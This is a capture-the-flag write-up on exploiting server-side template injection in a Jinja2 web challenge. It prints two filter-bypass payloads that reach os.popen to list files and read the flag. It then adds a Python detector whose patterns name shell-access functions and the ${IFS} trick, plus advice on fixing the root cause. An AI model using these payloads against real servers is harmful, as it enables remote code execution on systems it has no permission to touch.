Web - Antikythera

Description

Lost in the labyrinthine calculations of planetary motion, I stumbled upon an anomaly. Ancient Greek symbols, not our modern equations, whispered of celestial mechanics. Driven by a scientist's curiosity, I cracked their cryptic code. The unearthed knowledge, a testament to their forgotten ingenuity, fueled the creation of the "Greek Astronomical Calculator." This isn't just a tool for prediction; it's a portal to a bygone era's uncanny understanding of the cosmos.

Solution

Unfortunately, I don't have any images to show because the challenge is not up anymore. In short, the challenge has an input field that is vulnerable to SSTI (server-side template injection). This is confirmed by submitting the typical SSTI probe {{7*7}} and checking that the server evaluates it and returns 49.

Looking at HackTricks and trying out a few other payloads, the server appears to be running Jinja2 (Python).

Thankfully, HackTricks has a page dedicated to Jinja2 SSTI, including payloads that bypass typical filters.


If we scroll down the page, we find a payload that avoids most of the typical filters:

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}

The payload above is an RCE payload that executes ls -l. Running it, we find flag.txt in the current directory.

Finally, we run the same payload with cat flag.txt to read the flag:

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat${IFS}flag.txt')|attr('read')()%}{%print(a)%}{%endwith%}
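The payload above works because the application filters input by looking for obvious tokens such as "__" and spaces, and the payload sidesteps those checks by reaching attributes through the attr filter, spelling underscores as \x5f hex escapes, and using ${IFS} in place of a space. Below is an added example (not part of the original write-up, and not the challenge's code) of a defender-side check that classifies submitted input as clean, a probe, or an exploitation attempt. It normalizes URL encoding and \xNN/\uNNNN escapes before matching, so the obfuscated form of __globals__ is seen as the same thing as the plain form. The indicator names, the sample inputs, and the verdict scheme are all constructed for this example.

```python
import re
import urllib.parse
from typing import Dict, List

# Jinja2 expression and statement delimiters; either one in user input is
# already a signal that template syntax is being submitted.
TEMPLATE_SYNTAX_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)

# Indicators that distinguish a harmless probe from an exploitation attempt.
# These are heuristics chosen for this example, run AFTER normalization.
INDICATORS = {
    # {{7*7}} style probe: two integers and an arithmetic operator
    "arith_probe": re.compile(r"\{\{\s*\d+\s*[*+\-/]\s*\d+\s*\}\}"),
    # __globals__, __builtins__, __import__ ... once escapes are decoded
    "dunder_attribute": re.compile(r"__[a-z]+__"),
    # the attr filter used to avoid writing dotted attribute access
    "attr_filter": re.compile(r"\|\s*attr\s*\("),
    # names that lead to command execution
    "shell_access": re.compile(r"\b(popen|system|subprocess|os)\b"),
    # ${IFS} as a stand-in for a space inside the shell command
    "ifs_space_bypass": re.compile(r"\$\{IFS\}"),
}


def normalize(value: str) -> str:
    """Undo the encodings a filter-bypass payload relies on.

    1. URL decoding, because the input usually arrives in a query string
       or form body.
    2. \\xNN and \\uNNNN escapes, so "\\x5f\\x5fglobals\\x5f\\x5f" becomes
       "__globals__" before the indicator patterns are applied.
    """
    value = urllib.parse.unquote(value)

    def _unescape(match: re.Match) -> str:
        hex_digits = match.group(1) or match.group(2)
        return chr(int(hex_digits, 16))

    return re.sub(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})", _unescape, value)


def classify(value: str) -> List[str]:
    """Return the list of indicator names that fire on the normalized input."""
    norm = normalize(value)
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    if TEMPLATE_SYNTAX_RE.search(norm):
        hits.insert(0, "template_syntax")
    return hits


def assess(value: str) -> Dict[str, object]:
    """Map the indicators to a verdict: clean, probe, or exploit."""
    hits = classify(value)
    if not hits:
        verdict = "clean"
    elif set(hits) <= {"template_syntax", "arith_probe"}:
        verdict = "probe"  # template syntax evaluated, but no code execution
    else:
        verdict = "exploit"  # attribute walking or shell access present
    return {"verdict": verdict, "indicators": hits}


# Constructed sample inputs. The last one is the ls payload from the write-up,
# kept verbatim so the escape handling is exercised.
SAMPLE_INPUTS = [
    ("benign", "position of Mars on the summer solstice"),
    ("probe", "{{7*7}}"),
    ("url_encoded_probe", "%7B%7B7*7%7D%7D"),
    ("writeup_payload", r"""{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}"""),
]

if __name__ == "__main__":
    for label, raw in SAMPLE_INPUTS:
        result = assess(raw)
        print(f"{label:20} {result['verdict']:8} {', '.join(result['indicators'])}")
```

Detection like this is a compensating control, not the fix. The root cause of SSTI is rendering user input as template source (for example by concatenating it into a string passed to render_template_string); passing the input as a template variable instead leaves it as data that Jinja2 never parses, and the escape tricks above become irrelevant. The "shell_access" pattern uses word boundaries, so ordinary prose containing "cosmos" does not trigger it, but any keyword heuristic will have false positives and should feed an alert rather than a hard block.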
